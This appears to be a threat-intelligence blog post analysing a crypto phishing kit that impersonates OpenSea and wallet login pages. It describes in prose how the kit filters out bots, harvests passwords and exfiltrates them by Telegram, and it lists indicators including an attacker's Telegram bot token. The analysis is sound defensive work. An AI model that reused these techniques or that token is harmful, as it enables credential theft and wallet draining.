The growing allure of cryptocurrencies draws both investors and cybercriminals to the digital finance sphere, with phishing nets targeting crypto wallets and businesses emerging as a key threat. These complex schemes take advantage of the trust placed in trustworthy bitcoin services, using deceptive strategies to steal digital assets from unsuspecting consumers.
This blog digs into the internal workings of a recently discovered phishing kit, which was painstakingly crafted to spoof the OpenSea platform—a leading marketplace for NFTs and digital collectables. Through an in-depth analysis,
we identify fraudsters’ tactics for collecting sensitive user information.
Anatomy of Crypto Phishing Kit
Findings
The Bolster researchers discovered a phishing kit on the CheckPhish platform that impersonated OpeaSea. This phishing kit is designed to collect IP addresses, operating systems, and passwords from crypto wallet users and then exfiltrate them using the Telegram bot, a popular strategy used in most phishing efforts. The wallets being targeted are Opensea, MetaMask, Trust Wallet, WalletConnect, Coinbase, Crypto, and Ledger.
Learn more about Telegram scams
Analysis
CrawlerDetect is a PHP class that detects bots, crawlers, and spiders using the user agent and http_ from headers. Currently capable of detecting thousands of bots, spiders, and crawlers.
The PHP script is part of the phishing campaign targeting OpenSea users, gathering their personal information such as IP address, operating system, and passwords, then passing this data to attackers via Telegram for unauthorized access or exploitation.
This JavaScript code defines functions that open new browser windows with specific dimensions for various cryptocurrency wallets (e.g., MetaMask, Trust Wallet, WalletConnect, Coinbase, Crypto.com, and Ledger) and disable certain browser features, most likely to mimic legitimate wallet login pages as part of the phishing scheme.
MITRE ATT&CK
Understanding the tactics and techniques is critical for creating strong security measures and preventing potential threats. The Mitre TTP, after analysis of the webpage and phishing kit, is given below:
| ID | Tactic | Technique | Procedure |
|---|---|---|---|
|
T1589 |
Reconnaissance |
Gather Victim |
Using CrawlerDetect, adversary may be able to deduce whether the visitor is a real potential victim or an automated system, focusing their efforts on real users, and using the CrawlerDetect feature to boost the kit’s stealth and efficacy by evading automated detection measures. |
|
T1591 |
Reconnaissance |
Gather Victim |
Adversary gathered the information on Opensea, MetaMask, Trust Wallet, WalletConnect, Coinbase, Crypto, and Ledger like social media pages, logos, and website details to create the scampage and phishing kit. |
|
T1583 |
Resource |
Acquire |
Adversary using domains, C2 servers and telegram. |
|
T1566 |
Initial Access |
Phishing |
The phishing kit symbolizes the phishing strategy of fooling people into believing they are interacting with authorized OpenSea pages, allowing first access to their information. |
|
T1204 |
Execution |
User Execution |
Victims carry out the phishing technique by engaging with the false OpenSea page, specifically by attempting to log in using the fake cryptocurrency wallet windows generated by the JavaScript code. |
|
T1027 |
Defense Evasion |
Obfuscated Files |
Adversary attempted to encrypt and obfuscate major portion of the phishing kit to hide the motive and functions of the scripts. |
|
T1562 |
Defense Evasion |
Impair Defenses |
The JavaScript routines that disable browser functionality is also intended to weaken security safeguards that would otherwise warn users to the phishing effort. |
|
T1056 |
Credential |
Input Capture |
The PHP script gathers personal information such IP addresses, operating systems, and passwords. |
|
T1056 |
Collection |
Input Capture |
The PHP script gathers personal information such IP addresses, operating systems, and passwords. |
|
T1113 |
Collection |
Screen Capture |
Phishing kits that mimic wallet login screens collect user inputs (passwords, PINs, etc.) as part of their collection phase. |
|
T1071 |
Command and Control |
Application Layer |
Data exfiltration to attackers using Telegram demonstrates the usage of application layer protocols for command and control communication. |
|
T1041 |
Exfiltration |
Exfiltration over C2 Channel |
The acquired data, including personal and authentication information, is sent to the attackers via the Telegram bot, which serves as a C2 (Command and Control) channel. |
|
T1565 |
Impact |
Data |
Obtaining login passwords and other sensitive information is used to conduct illicit transactions, drain wallets, or corrupt more accounts, thereby directly affecting the victim’s digital assets. |
Impact & Mitigation
| IMPACT | MITIGATION |
|---|---|
|
Breach and loss of personal identifiable information such as IP address, operating system, and passwords. |
Implementing advanced security solutions, such as two-factor authentication (2FA) for wallet access and transactions can provide additional protection against illegal access. |
|
Loss of wallet funds and assets leading to financial loss. |
Use legitimate websites and social medias for the transactions. |
| Damage to Brand Reputation. |
Immediately report any fraudulent transaction witnessed in the account and wallet. |
Phishing Nets are Evolving
The inventiveness of phishing attacks directed towards cryptocurrency wallets and companies is a stark reminder of the constant care that must be taken to safeguard digital assets in the ever-changing realm of digital finance.
These cunning scams use the names of trustworthy cryptocurrency wallets and companies to deceive unsuspecting individuals, preying on their confidence and human mistakes.
An increasing number of proficient attackers are drawn to cryptocurrencies due to their growing popularity, as they want to profit from the ever-increasing market. People and corporations must stay current on the latest phishing strategies and establish comprehensive security processes.
Proactive investigation and vigilant monitoring are critical for detecting and limiting the efforts of individuals behind sophisticated phishing campaigns, especially when new methods of attack arise.
Our analysis emphasizes the significance of maintaining ongoing monitoring and developing forward-thinking measures to combat these dangers.
Appendix
| IOC’s | |
|---|---|
|
Website |
opensea-claim[-]item[.]lanzavac[.]com |
|
IP |
185.94[.]230.197 |
|
file_hash opensea.zip |
82bfa1ce7ee626671a238b1d3a7f9b4b47c342a9492315fd48abd2691a6937bf |
|
file_hash openseaupdated.zip |
42f8959cc65ea9e5508d2d0172c83ce5b9b658d7655d8e2a8e09dc58de33ce97 |
|
Telegram Bot API |
7128876958:AAECW33NKPph97ripVVGiAW4PALxM3-Pi4Q |
|
Telegram Chat ID |
6530923855 |
